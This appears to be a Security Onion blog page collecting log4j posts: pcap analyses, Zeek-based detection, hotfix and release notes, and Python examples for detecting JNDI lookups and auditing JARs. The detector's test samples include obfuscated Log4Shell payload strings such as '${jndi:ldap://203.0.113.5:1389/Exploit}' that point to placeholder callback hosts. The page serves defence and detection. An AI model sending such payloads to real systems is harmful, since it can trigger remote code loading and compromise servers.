Showing posts with label log4j. Show all posts

Wednesday, January 5, 2022

Quick Malware Analysis: log4j pcap from 2022-01-03

Thanks to Brad Duncan for sharing this pcap!
https://www.malware-traffic-analysis.net/2022/01/03/index.html

We did a quick analysis of this pcap on the latest version of Security Onion with Zeek log4j scripts and so-import-pcap:
https://docs.securityonion.net/en/2.3/zeek.html#custom-script-example-log4j
https://docs.securityonion.net/en/2.3/so-import-pcap.html

About Security Onion

Security Onion is a versatile and scalable platform that can run on small virtual machines and can also scale up to the opposite end of the hardware spectrum to take advantage of extremely powerful server-class machines.  Security Onion can also scale horizontally, growing from a standalone single-machine deployment to a full distributed deployment with tens or hundreds of machines as dictated by your enterprise visibility needs.

To learn more about Security Onion, please see:
https://securityonion.net
https://securityonion.net/docs

More Samples

Find all of our Quick Malware posts at:
https://blog.securityonion.net/search/label/quick%20malware%20analysis

Screenshots

Tuesday, January 4, 2022

Quick Malware Analysis: log4j pcap from 2021-12-20

Thanks to Brad Duncan for sharing this pcap!
https://www.malware-traffic-analysis.net/2021/12/20/index.html

We did a quick analysis of this pcap on the latest version of Security Onion with Zeek log4j scripts and so-import-pcap:
https://docs.securityonion.net/en/2.3/zeek.html#custom-script-example-log4j
https://docs.securityonion.net/en/2.3/so-import-pcap.html

About Security Onion

Security Onion is a versatile and scalable platform that can run on small virtual machines and can also scale up to the opposite end of the hardware spectrum to take advantage of extremely powerful server-class machines.  Security Onion can also scale horizontally, growing from a standalone single-machine deployment to a full distributed deployment with tens or hundreds of machines as dictated by your enterprise visibility needs.

To learn more about Security Onion, please see:
https://securityonion.net
https://securityonion.net/docs

More Samples

Find all of our Quick Malware posts at:
https://blog.securityonion.net/search/label/quick%20malware%20analysis

Screenshots

Thursday, December 23, 2021

Detecting Log4j Exploitation Attempts via Zeek in Security Onion

Corelight has developed a Zeek package to detect log4j exploitation attempts:

https://github.com/corelight/cve-2021-44228

This package contains Zeek scripts which can easily be loaded into your Security Onion deployment. We've documented this process here:

https://docs.securityonion.net/en/2.3/zeek.html#custom-script-example-log4j

After following this process, we ran so-import-pcap on the log4j pcap from https://www.malware-traffic-analysis.net/2021/12/14/index.html:
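To show the kind of check a detection like this has to perform, here is an added illustration in Python. It is our own example for this post, not Corelight's Zeek script and not part of Security Onion. It URL-decodes the input, collapses the obfuscations seen in Log4Shell payloads (the lower/upper case-mapping lookups and the "default value" trick that splits the word jndi into pieces), then matches the resulting JNDI lookup and pulls out the callback endpoint the victim would connect to. The sample header values are constructed for the demo, not taken from the pcap; in practice you would feed it the URI, User-Agent, Referer and other header fields from your HTTP logs.

```python
"""Detect Log4Shell (CVE-2021-44228) JNDI lookup strings in HTTP request data.

Added example, not Corelight's Zeek package and not Security Onion code.
SAMPLES below are constructed header values, not real traffic.
"""
import re
from urllib.parse import unquote

# Innermost ${...} lookup, i.e. one with no further "{" or "}" inside it.
_INNER = re.compile(r"\$\{([^{}]*)\}")
# A JNDI lookup once obfuscation has been collapsed: ${jndi:ldap://host:port/path}
_JNDI = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+):/*(?P<target>[^}]*)\}", re.IGNORECASE)


def _collapse(inner):
    """Return the literal a single obfuscation lookup yields, or None if it is not one.

    Handles the two tricks attackers used to split the word "jndi":
      ${lower:J} / ${upper:j}   -> case-mapping lookups
      ${env:NOPE:-j} / ${::-j}  -> default-value syntax (missing key, default "j")
    """
    if ":-" in inner:
        return inner.rsplit(":-", 1)[1]
    key, sep, arg = inner.partition(":")
    if sep and key.lower() == "lower":
        return arg.lower()
    if sep and key.lower() == "upper":
        return arg.upper()
    return None


def normalize(text, max_rounds=20):
    """URL-decode, then repeatedly collapse inner obfuscation lookups (bounded)."""
    text = unquote(text)
    for _ in range(max_rounds):  # deeply nested payloads are themselves suspicious
        changed = False

        def _sub(match):
            nonlocal changed
            literal = _collapse(match.group(1))
            if literal is None:
                return match.group(0)
            changed = True
            return literal

        text = _INNER.sub(_sub, text)
        if not changed:
            break
    return text


def find_jndi(text):
    """Return (scheme, callback host[:port]) for the first JNDI lookup in text, else None."""
    m = _JNDI.search(normalize(text))
    if not m:
        return None
    callback = m.group("target").split("/", 1)[0]
    return m.group("scheme").lower(), callback


# Constructed sample header values (not real traffic).
SAMPLES = [
    ("plain",      "${jndi:ldap://203.0.113.5:1389/Exploit}"),
    ("lower",      "${${lower:j}${lower:n}${lower:d}${lower:i}:${lower:l}dap://203.0.113.7:1389/a}"),
    ("urlencoded", "%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2Fcb.example%2Fa%7D"),
    ("benign",     "Mozilla/5.0 (X11; Linux x86_64) ${date:yyyy}"),
]


def scan(samples=SAMPLES):
    """Return {label: (scheme, callback)} for every sample that carries a JNDI lookup."""
    return {label: hit for label, value in samples if (hit := find_jndi(value))}


if __name__ == "__main__":
    for label, (scheme, callback) in scan().items():
        print(f"{label:11s} {scheme:5s} callback -> {callback}")
```

The "benign" sample keeps a non-JNDI lookup so the check does not fire on every dollar-brace it sees; only a lookup that resolves to jndi: after normalization is reported. The callback value is what you would pivot on next in your DNS and connection logs.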

Tuesday, December 21, 2021

Security Onion 2.3.91 Now Available including Elastic 7.16.2 and Log4j 2.17.0!

We recently released Security Onion 2.3.90 and a few hotfixes:
https://blog.securityonion.net/2021/11/security-onion-2390-now-available.html
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-wazuh
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-airgapfix
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-20211206
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-20211210
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-20211213

Today, we are releasing Security Onion 2.3.91:
https://docs.securityonion.net/en/2.3/release-notes.html#changes

If you haven't updated recently, then you should review all links above so that you are aware of all recent changes.

Summary

Several vulnerabilities were recently announced in log4j:
https://logging.apache.org/log4j/2.x/security.html

We released an initial hotfix on 2021/12/10:
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-20211210

Elastic later released additional details:
https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476

We then released a second hotfix on 2021/12/13:
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-20211213

Today's 2.3.91 release updates to Elastic 7.16.2 which includes Log4j 2.17.0:
https://www.elastic.co/blog/new-elasticsearch-and-logstash-releases-upgrade-apache-log4j2

Known Upgrade Issues

Since we are moving from Elastic 7.15 to 7.16, please be aware that custom settings in Kibana may be overwritten during upgrade.

If soup displays the following message:

warning: setlocale: LC_CTYPE: cannot change locale (en_US.UTF-8): No such file or directory

then you may need to run the following command:

sudo locale-gen en_US.UTF-8

For more information, please see:
https://github.com/Security-Onion-Solutions/securityonion/issues/6599 

After soup completes, a vulnerability scanner run against the filesystem may still find older versions of log4j inside the previous, now unused Docker images. Soup always keeps the previous version of each Docker image, so those images (and the log4j copies inside them) are removed automatically at the next Docker image update.

Internet-Connected Deployments

If your Security Onion deployment has Internet access, simply run "sudo soup" as described here:
https://docs.securityonion.net/en/2.3/soup.html

Airgap Deployments

If you have an airgap deployment, download the new ISO image from the usual location:
https://securityonion.net/download

Then follow the steps here:
https://docs.securityonion.net/en/2.3/airgap.html#security-onion-version-updates

Security Onion 16.04

If you are still running Security Onion 16.04, please note that it is past End Of Life. Please take this opportunity to upgrade to Security Onion 2:
https://docs.securityonion.net/en/2.3/appendix.html

Questions or Problems

If you have questions or problems, please see our community support forum guidelines:
https://docs.securityonion.net/en/2.3/community-support.html

You can then find the community support forum at:
https://securityonion.net/discuss

Monday, December 13, 2021

Security Onion 2.3.90 20211213 Hotfix Now Available to Fully Mitigate All Known log4j Attack Vectors!

We recently released Security Onion 2.3.90 and a few hotfixes:
https://blog.securityonion.net/2021/11/security-onion-2390-now-available.html
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-wazuh
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-airgapfix
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-20211206
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-20211210

Today, we are releasing an additional hotfix:
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-20211213

If you haven't updated recently, then you should review all links above so that you are aware of all recent changes.

Summary

A vulnerability was recently announced in log4j:
https://github.com/advisories/GHSA-jfh8-c2jp-5v3q

We released an initial hotfix on Friday:
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-20211210

Elastic later released additional details:
https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476

Today's hotfix addresses all known attack vectors for the log4j vulnerability by fully removing the JndiLookup class.

UPDATE 2021/12/14 An additional CVE was announced:
https://nvd.nist.gov/vuln/detail/CVE-2021-45046

The advisory for this new CVE recommends removing the JndiLookup class, which is exactly what this 20211213 hotfix already does.

UPDATE 2021/12/16 If you scan with a vulnerability scanner that only looks at version numbers, it may still report log4j as vulnerable, because we kept the existing version numbers and only removed the vulnerable JndiLookup class from the JARs. Also, some scanners may flag elasticsearch-sql-cli-7.15.2.jar, but there is no attack vector there according to Elastic:

This tool is standalone (NOT part of the server), for running ad-hoc SQL interactions. The tool does NOT accept external user input. The mere presence of the JndiLookup.class is not problematic here, but it looks interesting and could lead to confusion for scanners

UPDATE 2021/12/20 Elastic released 7.16.2 yesterday with updated Log4j 2.17.0, primarily to avoid false positives in vulnerability scanners. We are currently looking into this version. Updating to new Elastic containers will require a full release (not just a hotfix), so it will take some time.

Internet-Connected Deployments

If your Security Onion deployment has Internet access, simply run "sudo soup" as described here:
https://docs.securityonion.net/en/2.3/soup.html

Airgap Deployments

If you have an airgap deployment, download the new ISO image from the usual location:
https://securityonion.net/download

Then follow the steps here:
https://docs.securityonion.net/en/2.3/airgap.html#security-onion-version-updates

Security Onion 16.04

If you are still running Security Onion 16.04, please note that it is past End Of Life. Please take this opportunity to upgrade to Security Onion 2:
https://docs.securityonion.net/en/2.3/appendix.html

Questions or Problems

If you have questions or problems, please see our community support forum guidelines:
https://docs.securityonion.net/en/2.3/community-support.html

You can then find the community support forum at:
https://securityonion.net/discuss

Friday, December 10, 2021

Security Onion 2.3.90 20211210 Hotfix Now Available to Mitigate log4j Vulnerability!

We recently released Security Onion 2.3.90 and a few hotfixes:
https://blog.securityonion.net/2021/11/security-onion-2390-now-available.html
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-wazuh
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-airgapfix
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-20211206

Today, we are releasing an additional hotfix:
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-20211210

If you haven't updated recently, then you should review all links above so that you are aware of all recent changes.

A vulnerability was recently announced in log4j:
https://github.com/advisories/GHSA-jfh8-c2jp-5v3q

The following components have vulnerable versions of log4j:

  • Elasticsearch
  • Logstash
  • The separate Elasticsearch instance used by TheHive/Cortex

For Elasticsearch, Logstash, and the Elasticsearch instance for TheHive/Cortex, we've added the log4j2.formatMsgNoLookups=true option (a Log4j system property), which disables the message lookups this vulnerability abuses. It should be noted that TheHive/Cortex themselves include log4j 2.9.1 but NOT log4j-core-2.9.1.jar, which is the JAR that contains the JNDI lookup code. Instead, TheHive and Cortex log through the simple logging facade via log4j-to-slf4j-2.9.1.jar, and that bridge library does NOT contain the vulnerable JNDI lookup code.

UPDATE 2021/12/13 We've released an additional hotfix that more fully addresses all known log4j attack vectors:
https://blog.securityonion.net/2021/12/security-onion-2390-20211213-hotfix-now.html
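The scanner caveat in the 20211213 hotfix post (version numbers kept, JndiLookup class removed) and the note above about TheHive/Cortex shipping log4j-to-slf4j rather than log4j-core come down to the same check: look at what is actually inside the JAR, not at its version string. The Python below is an added illustration of that check, not Security Onion's hotfix code and not any scanner's logic. It builds four throwaway JARs with constructed contents in a temporary directory (placeholder class bytes, real entry names), then audits them; point audit() at a real directory, such as an extracted Docker image, to use it for real. The 2.17.0 threshold is the version the 2.3.91 release lands on; a JAR below that with the class still present is reported vulnerable.

```python
"""Check JARs for the JndiLookup class instead of trusting log4j version strings.

Added example, not Security Onion's hotfix and not a scanner's logic.
build_samples() writes constructed JARs so the demo runs offline.
"""
import io
import os
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Maven metadata shipped in log4j-core; its "version=" line is what version-only scanners read.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def _parse_version(text):
    return tuple(int(p) for p in text.strip().split(".") if p.isdigit())


def _inspect(zf):
    """Return (log4j-core version or None, JndiLookup present) for an open ZipFile, recursing into nested JARs."""
    version, present = None, False
    for name in zf.namelist():
        if name == JNDI_CLASS:
            present = True
        elif name == POM_PROPS:
            for line in zf.read(name).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        elif name.lower().endswith(".jar"):  # uber/fat JARs bundle log4j-core inside
            with zipfile.ZipFile(io.BytesIO(zf.read(name))) as nested:
                nested_version, nested_present = _inspect(nested)
                version = version or nested_version
                present = present or nested_present
    return version, present


def classify(version, present):
    """Verdict based on what is in the archive, not on the version string alone."""
    if present:
        if version and _parse_version(version) >= (2, 17, 0):
            return "ok"            # class present, but JNDI lookups are disabled by default in 2.17.0
        return "vulnerable"        # JndiLookup.class reachable: CVE-2021-44228 / CVE-2021-45046
    if version:
        return "mitigated"         # version-only scanners still flag this; the class is gone
    return "no-log4j-core"         # e.g. log4j-to-slf4j: bridge only, no lookup code


def audit(directory):
    """Map each *.jar found under directory to its verdict."""
    results = {}
    for root, _dirs, files in os.walk(directory):
        for fn in sorted(files):
            if fn.lower().endswith(".jar"):
                with zipfile.ZipFile(os.path.join(root, fn)) as zf:
                    results[fn] = classify(*_inspect(zf))
    return results


def _jar_bytes(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_samples(directory):
    """Write constructed test JARs (placeholder class bytes, real entry names) into directory."""
    cls = b"\xca\xfe\xba\xbe"  # JVM class-file magic; enough for a name-based check
    jars = {
        "log4j-core-2.11.1.jar": {JNDI_CLASS: cls, POM_PROPS: "version=2.11.1\n"},
        "log4j-core-2.11.1-hotfix.jar": {POM_PROPS: "version=2.11.1\n"},  # class deleted, version kept
        "log4j-to-slf4j-2.9.1.jar": {"META-INF/MANIFEST.MF": "Manifest-Version: 1.0\n"},
        "app-all.jar": {"lib/log4j-core-2.17.0.jar": _jar_bytes({JNDI_CLASS: cls, POM_PROPS: "version=2.17.0\n"})},
    }
    for fn, entries in jars.items():
        with open(os.path.join(directory, fn), "wb") as f:
            f.write(_jar_bytes(entries))


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        build_samples(tmp)
        return audit(tmp)


if __name__ == "__main__":
    for jar, verdict in demo().items():
        print(f"{verdict:14s} {jar}")
```

The "mitigated" verdict is the case the hotfix post warns about: a version-only scanner sees 2.11.1 and raises an alert, while the archive no longer carries the class that made it exploitable. The bridge JAR case mirrors TheHive/Cortex above: log4j-to-slf4j never contained log4j-core's lookup code, so there is nothing to remove.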

Internet-Connected Deployments

If your Security Onion deployment has Internet access, simply run "sudo soup" as described here:
https://docs.securityonion.net/en/2.3/soup.html

Airgap Deployments

If you have an airgap deployment, download the new ISO image from the usual location:

https://securityonion.net/download

Then follow the steps here:

https://docs.securityonion.net/en/2.3/airgap.html#security-onion-version-updates

Security Onion 16.04

If you are still running Security Onion 16.04, please note that it is past End Of Life. Please take this opportunity to upgrade to Security Onion 2:
https://docs.securityonion.net/en/2.3/appendix.html

Questions or Problems

If you have questions or problems, please see our community support forum guidelines:

https://docs.securityonion.net/en/2.3/community-support.html

You can then find the community support forum at:

https://securityonion.net/discuss
